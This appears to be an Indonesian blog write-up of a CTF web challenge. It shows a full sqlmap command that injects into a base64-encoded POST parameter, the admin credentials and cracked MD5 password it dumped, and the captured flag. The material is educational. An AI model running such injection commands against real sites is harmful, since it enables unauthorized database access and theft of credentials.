Writeup CTF Born to Protect : Lorem Ipsum – Diberikan sebuah web lorem ipsum yang mendukung 3 bahasa.

Setelah saya analisa, setiap di pilih salah satu bahasa, maka akan melakukan POST id yang dienkripsi dengan base64 ke data.php

Lorem IpsumBerdasarkan kategori, maka saya melakukan serangan SQL Injection dengan bantuan SQL Map

sqlmap -u http://35.197.134.203:8013/data.php –data “id=1″ –eval=”id=id.encode(‘base64’)” –level 5 –risk 3 –tables –random-agent –dbms SQLite

Terdapat 3 table

SQL Map

Table config berisi alamat url halaman admin, dan table n1mbusadmin berisi user dan password admin.

Kemudian kami dump satu persatu.

Dan saya menyimpulkan :

Halaman login : http://35.187.236.126:8013/1n1admbr0/

Username : backupuser

Password : a5b6e34b25f4722b811d371e957aea29 > linkinpark

Lalu saya gunakan informasi tersebut untuk login ke halaman admin

CTF Lorem Ipsum

Terdapat file flag.

Dan ketika  dibuka berisi flag nya

Flag Lorem IpsumFlag : B2P{af39e6e718f3fb8f2de9ae9e6464b150}

Posted by Luqman Hakim

I am Luqman Hakim Y, founder of this blog. I am Software Engineer and Cyber Security Enthusiast from Indonesia.

All Posts Website

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.